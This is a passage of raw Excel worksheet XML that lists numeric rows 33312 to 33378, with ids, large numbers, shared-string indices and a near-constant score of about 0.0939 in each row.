        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33312" ht="15.75" customHeight="1">
      <c r="A33312" s="1">
        <v>22127.0</v>
      </c>
      <c r="B33312" s="2">
        <v>3.1016617E7</v>
      </c>
      <c r="C33312" s="2" t="s">
        <v>2321</v>
      </c>
      <c r="D33312" s="2">
        <v>1.0</v>
      </c>
      <c r="E33312" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33312" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33313" ht="15.75" customHeight="1">
      <c r="A33313" s="1">
        <v>22216.0</v>
      </c>
      <c r="B33313" s="2">
        <v>3.2219189E7</v>
      </c>
      <c r="C33313" s="2" t="s">
        <v>32068</v>
      </c>
      <c r="D33313" s="2">
        <v>1.0</v>
      </c>
      <c r="E33313" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33313" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33314" ht="15.75" customHeight="1">
      <c r="A33314" s="1">
        <v>23179.0</v>
      </c>
      <c r="B33314" s="2">
        <v>5.2197775E7</v>
      </c>
      <c r="C33314" s="2" t="s">
        <v>32069</v>
      </c>
      <c r="D33314" s="2">
        <v>1.0</v>
      </c>
      <c r="E33314" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33314" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33315" ht="15.75" customHeight="1">
      <c r="A33315" s="1">
        <v>23862.0</v>
      </c>
      <c r="B33315" s="2">
        <v>8331585.0</v>
      </c>
      <c r="C33315" s="2" t="s">
        <v>32070</v>
      </c>
      <c r="D33315" s="2">
        <v>1.0</v>
      </c>
      <c r="E33315" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33315" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33316" ht="15.75" customHeight="1">
      <c r="A33316" s="1">
        <v>24424.0</v>
      </c>
      <c r="B33316" s="2">
        <v>1.0851147E7</v>
      </c>
      <c r="C33316" s="2" t="s">
        <v>32071</v>
      </c>
      <c r="D33316" s="2">
        <v>1.0</v>
      </c>
      <c r="E33316" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33316" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33317" ht="15.75" customHeight="1">
      <c r="A33317" s="1">
        <v>24549.0</v>
      </c>
      <c r="B33317" s="2">
        <v>1.1273697E7</v>
      </c>
      <c r="C33317" s="2" t="s">
        <v>32072</v>
      </c>
      <c r="D33317" s="2">
        <v>1.0</v>
      </c>
      <c r="E33317" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33317" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33318" ht="15.75" customHeight="1">
      <c r="A33318" s="1">
        <v>24716.0</v>
      </c>
      <c r="B33318" s="2">
        <v>1.1699008E7</v>
      </c>
      <c r="C33318" s="2" t="s">
        <v>32073</v>
      </c>
      <c r="D33318" s="2">
        <v>1.0</v>
      </c>
      <c r="E33318" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33318" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33319" ht="15.75" customHeight="1">
      <c r="A33319" s="1">
        <v>24980.0</v>
      </c>
      <c r="B33319" s="2">
        <v>1.2676985E7</v>
      </c>
      <c r="C33319" s="2" t="s">
        <v>32074</v>
      </c>
      <c r="D33319" s="2">
        <v>1.0</v>
      </c>
      <c r="E33319" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33319" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33320" ht="15.75" customHeight="1">
      <c r="A33320" s="1">
        <v>25977.0</v>
      </c>
      <c r="B33320" s="2">
        <v>1.5292334E7</v>
      </c>
      <c r="C33320" s="2" t="s">
        <v>32075</v>
      </c>
      <c r="D33320" s="2">
        <v>1.0</v>
      </c>
      <c r="E33320" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33320" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33321" ht="15.75" customHeight="1">
      <c r="A33321" s="1">
        <v>26010.0</v>
      </c>
      <c r="B33321" s="2">
        <v>1.5339366E7</v>
      </c>
      <c r="C33321" s="2" t="s">
        <v>32076</v>
      </c>
      <c r="D33321" s="2">
        <v>1.0</v>
      </c>
      <c r="E33321" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33321" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33322" ht="15.75" customHeight="1">
      <c r="A33322" s="1">
        <v>26181.0</v>
      </c>
      <c r="B33322" s="2">
        <v>1.6153138E7</v>
      </c>
      <c r="C33322" s="2" t="s">
        <v>32077</v>
      </c>
      <c r="D33322" s="2">
        <v>1.0</v>
      </c>
      <c r="E33322" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33322" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33323" ht="15.75" customHeight="1">
      <c r="A33323" s="1">
        <v>26542.0</v>
      </c>
      <c r="B33323" s="2">
        <v>1.773357E7</v>
      </c>
      <c r="C33323" s="2" t="s">
        <v>32078</v>
      </c>
      <c r="D33323" s="2">
        <v>1.0</v>
      </c>
      <c r="E33323" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33323" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33324" ht="15.75" customHeight="1">
      <c r="A33324" s="1">
        <v>26707.0</v>
      </c>
      <c r="B33324" s="2">
        <v>1.8188228E7</v>
      </c>
      <c r="C33324" s="2" t="s">
        <v>32079</v>
      </c>
      <c r="D33324" s="2">
        <v>1.0</v>
      </c>
      <c r="E33324" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33324" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33325" ht="15.75" customHeight="1">
      <c r="A33325" s="1">
        <v>27463.0</v>
      </c>
      <c r="B33325" s="2">
        <v>2.1987265E7</v>
      </c>
      <c r="C33325" s="2" t="s">
        <v>32080</v>
      </c>
      <c r="D33325" s="2">
        <v>1.0</v>
      </c>
      <c r="E33325" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33325" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33326" ht="15.75" customHeight="1">
      <c r="A33326" s="1">
        <v>27485.0</v>
      </c>
      <c r="B33326" s="2">
        <v>2.2039069E7</v>
      </c>
      <c r="C33326" s="2" t="s">
        <v>32066</v>
      </c>
      <c r="D33326" s="2">
        <v>1.0</v>
      </c>
      <c r="E33326" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33326" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33327" ht="15.75" customHeight="1">
      <c r="A33327" s="1">
        <v>27636.0</v>
      </c>
      <c r="B33327" s="2">
        <v>2.2739466E7</v>
      </c>
      <c r="C33327" s="2" t="s">
        <v>32081</v>
      </c>
      <c r="D33327" s="2">
        <v>1.0</v>
      </c>
      <c r="E33327" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33327" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33328" ht="15.75" customHeight="1">
      <c r="A33328" s="1">
        <v>27983.0</v>
      </c>
      <c r="B33328" s="2">
        <v>2.4042399E7</v>
      </c>
      <c r="C33328" s="2" t="s">
        <v>32082</v>
      </c>
      <c r="D33328" s="2">
        <v>1.0</v>
      </c>
      <c r="E33328" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33328" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33329" ht="15.75" customHeight="1">
      <c r="A33329" s="1">
        <v>28067.0</v>
      </c>
      <c r="B33329" s="2">
        <v>2.4613868E7</v>
      </c>
      <c r="C33329" s="2" t="s">
        <v>32067</v>
      </c>
      <c r="D33329" s="2">
        <v>1.0</v>
      </c>
      <c r="E33329" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33329" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33330" ht="15.75" customHeight="1">
      <c r="A33330" s="1">
        <v>28250.0</v>
      </c>
      <c r="B33330" s="2">
        <v>2.5256132E7</v>
      </c>
      <c r="C33330" s="2" t="s">
        <v>26523</v>
      </c>
      <c r="D33330" s="2">
        <v>1.0</v>
      </c>
      <c r="E33330" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33330" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33331" ht="15.75" customHeight="1">
      <c r="A33331" s="1">
        <v>29269.0</v>
      </c>
      <c r="B33331" s="2">
        <v>3.0991304E7</v>
      </c>
      <c r="C33331" s="2" t="s">
        <v>32083</v>
      </c>
      <c r="D33331" s="2">
        <v>1.0</v>
      </c>
      <c r="E33331" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33331" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33332" ht="15.75" customHeight="1">
      <c r="A33332" s="1">
        <v>29853.0</v>
      </c>
      <c r="B33332" s="2">
        <v>3.576704E7</v>
      </c>
      <c r="C33332" s="2" t="s">
        <v>32084</v>
      </c>
      <c r="D33332" s="2">
        <v>1.0</v>
      </c>
      <c r="E33332" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33332" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33333" ht="15.75" customHeight="1">
      <c r="A33333" s="1">
        <v>29930.0</v>
      </c>
      <c r="B33333" s="2">
        <v>3607052.0</v>
      </c>
      <c r="C33333" s="2" t="s">
        <v>32085</v>
      </c>
      <c r="D33333" s="2">
        <v>1.0</v>
      </c>
      <c r="E33333" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33333" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33334" ht="15.75" customHeight="1">
      <c r="A33334" s="1">
        <v>30857.0</v>
      </c>
      <c r="B33334" s="2">
        <v>4.6163447E7</v>
      </c>
      <c r="C33334" s="2" t="s">
        <v>32086</v>
      </c>
      <c r="D33334" s="2">
        <v>1.0</v>
      </c>
      <c r="E33334" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33334" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33335" ht="15.75" customHeight="1">
      <c r="A33335" s="1">
        <v>31419.0</v>
      </c>
      <c r="B33335" s="2">
        <v>5.0100331E7</v>
      </c>
      <c r="C33335" s="2" t="s">
        <v>32087</v>
      </c>
      <c r="D33335" s="2">
        <v>1.0</v>
      </c>
      <c r="E33335" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33335" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33336" ht="15.75" customHeight="1">
      <c r="A33336" s="1">
        <v>31774.0</v>
      </c>
      <c r="B33336" s="2">
        <v>5.2197774E7</v>
      </c>
      <c r="C33336" s="2" t="s">
        <v>32069</v>
      </c>
      <c r="D33336" s="2">
        <v>1.0</v>
      </c>
      <c r="E33336" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33336" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33337" ht="15.75" customHeight="1">
      <c r="A33337" s="1">
        <v>31903.0</v>
      </c>
      <c r="B33337" s="2">
        <v>5296419.0</v>
      </c>
      <c r="C33337" s="2" t="s">
        <v>32088</v>
      </c>
      <c r="D33337" s="2">
        <v>1.0</v>
      </c>
      <c r="E33337" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33337" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33338" ht="15.75" customHeight="1">
      <c r="A33338" s="1">
        <v>32040.0</v>
      </c>
      <c r="B33338" s="2">
        <v>5369993.0</v>
      </c>
      <c r="C33338" s="2" t="s">
        <v>32089</v>
      </c>
      <c r="D33338" s="2">
        <v>1.0</v>
      </c>
      <c r="E33338" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33338" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33339" ht="15.75" customHeight="1">
      <c r="A33339" s="1">
        <v>32217.0</v>
      </c>
      <c r="B33339" s="2">
        <v>5488862.0</v>
      </c>
      <c r="C33339" s="2" t="s">
        <v>32090</v>
      </c>
      <c r="D33339" s="2">
        <v>1.0</v>
      </c>
      <c r="E33339" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33339" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33340" ht="15.75" customHeight="1">
      <c r="A33340" s="1">
        <v>32591.0</v>
      </c>
      <c r="B33340" s="2">
        <v>5802568.0</v>
      </c>
      <c r="C33340" s="2" t="s">
        <v>32091</v>
      </c>
      <c r="D33340" s="2">
        <v>1.0</v>
      </c>
      <c r="E33340" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33340" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33341" ht="15.75" customHeight="1">
      <c r="A33341" s="1">
        <v>32968.0</v>
      </c>
      <c r="B33341" s="2">
        <v>6550675.0</v>
      </c>
      <c r="C33341" s="2" t="s">
        <v>32092</v>
      </c>
      <c r="D33341" s="2">
        <v>1.0</v>
      </c>
      <c r="E33341" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33341" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33342" ht="15.75" customHeight="1">
      <c r="A33342" s="1">
        <v>33352.0</v>
      </c>
      <c r="B33342" s="2">
        <v>7608185.0</v>
      </c>
      <c r="C33342" s="2" t="s">
        <v>32093</v>
      </c>
      <c r="D33342" s="2">
        <v>1.0</v>
      </c>
      <c r="E33342" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33342" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33343" ht="15.75" customHeight="1">
      <c r="A33343" s="1">
        <v>33364.0</v>
      </c>
      <c r="B33343" s="2">
        <v>7632037.0</v>
      </c>
      <c r="C33343" s="2" t="s">
        <v>32094</v>
      </c>
      <c r="D33343" s="2">
        <v>1.0</v>
      </c>
      <c r="E33343" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33343" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33344" ht="15.75" customHeight="1">
      <c r="A33344" s="1">
        <v>33950.0</v>
      </c>
      <c r="B33344" s="2">
        <v>9299843.0</v>
      </c>
      <c r="C33344" s="2" t="s">
        <v>32095</v>
      </c>
      <c r="D33344" s="2">
        <v>1.0</v>
      </c>
      <c r="E33344" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33344" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33345" ht="15.75" customHeight="1">
      <c r="A33345" s="1">
        <v>34163.0</v>
      </c>
      <c r="B33345" s="2">
        <v>9900354.0</v>
      </c>
      <c r="C33345" s="2" t="s">
        <v>32096</v>
      </c>
      <c r="D33345" s="2">
        <v>1.0</v>
      </c>
      <c r="E33345" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33345" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="33346" ht="15.75" customHeight="1">
      <c r="A33346" s="1">
        <v>5507.0</v>
      </c>
      <c r="B33346" s="2">
        <v>4.5836528E7</v>
      </c>
      <c r="C33346" s="2" t="s">
        <v>32097</v>
      </c>
      <c r="D33346" s="2">
        <v>1.0</v>
      </c>
      <c r="E33346" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33346" s="2">
        <v>0.09393939393939393</v>
      </c>
    </row>
    <row r="33347" ht="15.75" customHeight="1">
      <c r="A33347" s="1">
        <v>11111.0</v>
      </c>
      <c r="B33347" s="2">
        <v>1.8767411E7</v>
      </c>
      <c r="C33347" s="2" t="s">
        <v>32098</v>
      </c>
      <c r="D33347" s="2">
        <v>1.0</v>
      </c>
      <c r="E33347" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33347" s="2">
        <v>0.09393939393939393</v>
      </c>
    </row>
    <row r="33348" ht="15.75" customHeight="1">
      <c r="A33348" s="1">
        <v>16910.0</v>
      </c>
      <c r="B33348" s="2">
        <v>4.8120706E7</v>
      </c>
      <c r="C33348" s="2" t="s">
        <v>32099</v>
      </c>
      <c r="D33348" s="2">
        <v>1.0</v>
      </c>
      <c r="E33348" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33348" s="2">
        <v>0.09393939393939393</v>
      </c>
    </row>
    <row r="33349" ht="15.75" customHeight="1">
      <c r="A33349" s="1">
        <v>19317.0</v>
      </c>
      <c r="B33349" s="2">
        <v>5.529242E7</v>
      </c>
      <c r="C33349" s="2" t="s">
        <v>32100</v>
      </c>
      <c r="D33349" s="2">
        <v>1.0</v>
      </c>
      <c r="E33349" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33349" s="2">
        <v>0.09393939393939393</v>
      </c>
    </row>
    <row r="33350" ht="15.75" customHeight="1">
      <c r="A33350" s="1">
        <v>22479.0</v>
      </c>
      <c r="B33350" s="2">
        <v>3.6889937E7</v>
      </c>
      <c r="C33350" s="2" t="s">
        <v>7287</v>
      </c>
      <c r="D33350" s="2">
        <v>1.0</v>
      </c>
      <c r="E33350" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33350" s="2">
        <v>0.09393939393939393</v>
      </c>
    </row>
    <row r="33351" ht="15.75" customHeight="1">
      <c r="A33351" s="1">
        <v>23987.0</v>
      </c>
      <c r="B33351" s="2">
        <v>9138413.0</v>
      </c>
      <c r="C33351" s="2" t="s">
        <v>32101</v>
      </c>
      <c r="D33351" s="2">
        <v>1.0</v>
      </c>
      <c r="E33351" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33351" s="2">
        <v>0.09393939393939393</v>
      </c>
    </row>
    <row r="33352" ht="15.75" customHeight="1">
      <c r="A33352" s="1">
        <v>30947.0</v>
      </c>
      <c r="B33352" s="2">
        <v>4.7336868E7</v>
      </c>
      <c r="C33352" s="2" t="s">
        <v>32102</v>
      </c>
      <c r="D33352" s="2">
        <v>1.0</v>
      </c>
      <c r="E33352" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33352" s="2">
        <v>0.09393939393939393</v>
      </c>
    </row>
    <row r="33353" ht="15.75" customHeight="1">
      <c r="A33353" s="1">
        <v>32219.0</v>
      </c>
      <c r="B33353" s="2">
        <v>5488862.0</v>
      </c>
      <c r="C33353" s="2" t="s">
        <v>32103</v>
      </c>
      <c r="D33353" s="2">
        <v>1.0</v>
      </c>
      <c r="E33353" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33353" s="2">
        <v>0.09393939393939393</v>
      </c>
    </row>
    <row r="33354" ht="15.75" customHeight="1">
      <c r="A33354" s="1">
        <v>1256.0</v>
      </c>
      <c r="B33354" s="2">
        <v>2.5207648E7</v>
      </c>
      <c r="C33354" s="2" t="s">
        <v>32104</v>
      </c>
      <c r="D33354" s="2">
        <v>1.0</v>
      </c>
      <c r="E33354" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33354" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="33355" ht="15.75" customHeight="1">
      <c r="A33355" s="1">
        <v>2777.0</v>
      </c>
      <c r="B33355" s="2">
        <v>3.5182635E7</v>
      </c>
      <c r="C33355" s="2" t="s">
        <v>32105</v>
      </c>
      <c r="D33355" s="2">
        <v>1.0</v>
      </c>
      <c r="E33355" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33355" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="33356" ht="15.75" customHeight="1">
      <c r="A33356" s="1">
        <v>4202.0</v>
      </c>
      <c r="B33356" s="2">
        <v>4.165194E7</v>
      </c>
      <c r="C33356" s="2" t="s">
        <v>32106</v>
      </c>
      <c r="D33356" s="2">
        <v>1.0</v>
      </c>
      <c r="E33356" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33356" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="33357" ht="15.75" customHeight="1">
      <c r="A33357" s="1">
        <v>6142.0</v>
      </c>
      <c r="B33357" s="2">
        <v>4.7833289E7</v>
      </c>
      <c r="C33357" s="2" t="s">
        <v>32107</v>
      </c>
      <c r="D33357" s="2">
        <v>1.0</v>
      </c>
      <c r="E33357" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33357" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="33358" ht="15.75" customHeight="1">
      <c r="A33358" s="1">
        <v>6171.0</v>
      </c>
      <c r="B33358" s="2">
        <v>4.7886995E7</v>
      </c>
      <c r="C33358" s="2" t="s">
        <v>32108</v>
      </c>
      <c r="D33358" s="2">
        <v>1.0</v>
      </c>
      <c r="E33358" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33358" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="33359" ht="15.75" customHeight="1">
      <c r="A33359" s="1">
        <v>6690.0</v>
      </c>
      <c r="B33359" s="2">
        <v>4.9179821E7</v>
      </c>
      <c r="C33359" s="2" t="s">
        <v>32109</v>
      </c>
      <c r="D33359" s="2">
        <v>1.0</v>
      </c>
      <c r="E33359" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33359" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="33360" ht="15.75" customHeight="1">
      <c r="A33360" s="1">
        <v>6974.0</v>
      </c>
      <c r="B33360" s="2">
        <v>5.0008342E7</v>
      </c>
      <c r="C33360" s="2" t="s">
        <v>32110</v>
      </c>
      <c r="D33360" s="2">
        <v>1.0</v>
      </c>
      <c r="E33360" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33360" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="33361" ht="15.75" customHeight="1">
      <c r="A33361" s="1">
        <v>7260.0</v>
      </c>
      <c r="B33361" s="2">
        <v>5.0756459E7</v>
      </c>
      <c r="C33361" s="2" t="s">
        <v>32111</v>
      </c>
      <c r="D33361" s="2">
        <v>1.0</v>
      </c>
      <c r="E33361" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33361" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="33362" ht="15.75" customHeight="1">
      <c r="A33362" s="1">
        <v>7401.0</v>
      </c>
      <c r="B33362" s="2">
        <v>5.1104232E7</v>
      </c>
      <c r="C33362" s="2" t="s">
        <v>32112</v>
      </c>
      <c r="D33362" s="2">
        <v>1.0</v>
      </c>
      <c r="E33362" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33362" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="33363" ht="15.75" customHeight="1">
      <c r="A33363" s="1">
        <v>8086.0</v>
      </c>
      <c r="B33363" s="2">
        <v>5.3040984E7</v>
      </c>
      <c r="C33363" s="2" t="s">
        <v>32113</v>
      </c>
      <c r="D33363" s="2">
        <v>1.0</v>
      </c>
      <c r="E33363" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33363" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="33364" ht="15.75" customHeight="1">
      <c r="A33364" s="1">
        <v>8864.0</v>
      </c>
      <c r="B33364" s="2">
        <v>5.4742613E7</v>
      </c>
      <c r="C33364" s="2" t="s">
        <v>32114</v>
      </c>
      <c r="D33364" s="2">
        <v>1.0</v>
      </c>
      <c r="E33364" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33364" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="33365" ht="15.75" customHeight="1">
      <c r="A33365" s="1">
        <v>8996.0</v>
      </c>
      <c r="B33365" s="2">
        <v>5.4968139E7</v>
      </c>
      <c r="C33365" s="2" t="s">
        <v>32115</v>
      </c>
      <c r="D33365" s="2">
        <v>1.0</v>
      </c>
      <c r="E33365" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33365" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="33366" ht="15.75" customHeight="1">
      <c r="A33366" s="1">
        <v>9092.0</v>
      </c>
      <c r="B33366" s="2">
        <v>5.5144452E7</v>
      </c>
      <c r="C33366" s="2" t="s">
        <v>32116</v>
      </c>
      <c r="D33366" s="2">
        <v>1.0</v>
      </c>
      <c r="E33366" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33366" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="33367" ht="15.75" customHeight="1">
      <c r="A33367" s="1">
        <v>11123.0</v>
      </c>
      <c r="B33367" s="2">
        <v>1.8938773E7</v>
      </c>
      <c r="C33367" s="2" t="s">
        <v>32117</v>
      </c>
      <c r="D33367" s="2">
        <v>1.0</v>
      </c>
      <c r="E33367" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33367" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="33368" ht="15.75" customHeight="1">
      <c r="A33368" s="1">
        <v>12288.0</v>
      </c>
      <c r="B33368" s="2">
        <v>2.821728E7</v>
      </c>
      <c r="C33368" s="2" t="s">
        <v>32118</v>
      </c>
      <c r="D33368" s="2">
        <v>1.0</v>
      </c>
      <c r="E33368" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33368" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="33369" ht="15.75" customHeight="1">
      <c r="A33369" s="1">
        <v>13090.0</v>
      </c>
      <c r="B33369" s="2">
        <v>3.3443947E7</v>
      </c>
      <c r="C33369" s="2" t="s">
        <v>32119</v>
      </c>
      <c r="D33369" s="2">
        <v>1.0</v>
      </c>
      <c r="E33369" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33369" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="33370" ht="15.75" customHeight="1">
      <c r="A33370" s="1">
        <v>13100.0</v>
      </c>
      <c r="B33370" s="2">
        <v>3.352461E7</v>
      </c>
      <c r="C33370" s="2" t="s">
        <v>32120</v>
      </c>
      <c r="D33370" s="2">
        <v>1.0</v>
      </c>
      <c r="E33370" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33370" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="33371" ht="15.75" customHeight="1">
      <c r="A33371" s="1">
        <v>13469.0</v>
      </c>
      <c r="B33371" s="2">
        <v>3.5235679E7</v>
      </c>
      <c r="C33371" s="2" t="s">
        <v>32121</v>
      </c>
      <c r="D33371" s="2">
        <v>1.0</v>
      </c>
      <c r="E33371" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33371" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="33372" ht="15.75" customHeight="1">
      <c r="A33372" s="1">
        <v>13891.0</v>
      </c>
      <c r="B33372" s="2">
        <v>3.7033516E7</v>
      </c>
      <c r="C33372" s="2" t="s">
        <v>32122</v>
      </c>
      <c r="D33372" s="2">
        <v>1.0</v>
      </c>
      <c r="E33372" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33372" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="33373" ht="15.75" customHeight="1">
      <c r="A33373" s="1">
        <v>14668.0</v>
      </c>
      <c r="B33373" s="2">
        <v>4.0453467E7</v>
      </c>
      <c r="C33373" s="2" t="s">
        <v>32123</v>
      </c>
      <c r="D33373" s="2">
        <v>1.0</v>
      </c>
      <c r="E33373" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33373" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="33374" ht="15.75" customHeight="1">
      <c r="A33374" s="1">
        <v>15924.0</v>
      </c>
      <c r="B33374" s="2">
        <v>4.4685824E7</v>
      </c>
      <c r="C33374" s="2" t="s">
        <v>32124</v>
      </c>
      <c r="D33374" s="2">
        <v>1.0</v>
      </c>
      <c r="E33374" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33374" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="33375" ht="15.75" customHeight="1">
      <c r="A33375" s="1">
        <v>16637.0</v>
      </c>
      <c r="B33375" s="2">
        <v>4.7117822E7</v>
      </c>
      <c r="C33375" s="2" t="s">
        <v>32125</v>
      </c>
      <c r="D33375" s="2">
        <v>1.0</v>
      </c>
      <c r="E33375" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33375" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="33376" ht="15.75" customHeight="1">
      <c r="A33376" s="1">
        <v>16859.0</v>
      </c>
      <c r="B33376" s="2">
        <v>4.7936875E7</v>
      </c>
      <c r="C33376" s="2" t="s">
        <v>32126</v>
      </c>
      <c r="D33376" s="2">
        <v>1.0</v>
      </c>
      <c r="E33376" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33376" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="33377" ht="15.75" customHeight="1">
      <c r="A33377" s="1">
        <v>18024.0</v>
      </c>
      <c r="B33377" s="2">
        <v>5.1519213E7</v>
      </c>
      <c r="C33377" s="2" t="s">
        <v>32127</v>
      </c>
      <c r="D33377" s="2">
        <v>1.0</v>
      </c>
      <c r="E33377" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33377" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="33378" ht="15.75" customHeight="1">
      <c r="A33378" s="1">
        <v>18497.0</v>
      </c>
      <c r="B33378" s="2">
        <v>5.2933504E7</v>
      </c>
      <c r="C33378" s="2" t="s">
        <v>32128</v>
      </c>
      <c r="D33378" s="2">
        <v>1.0</v>
      </c>
      <c r="E33378" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33378" s="2">
        <v>0.09393939393939392</v>
      </c>
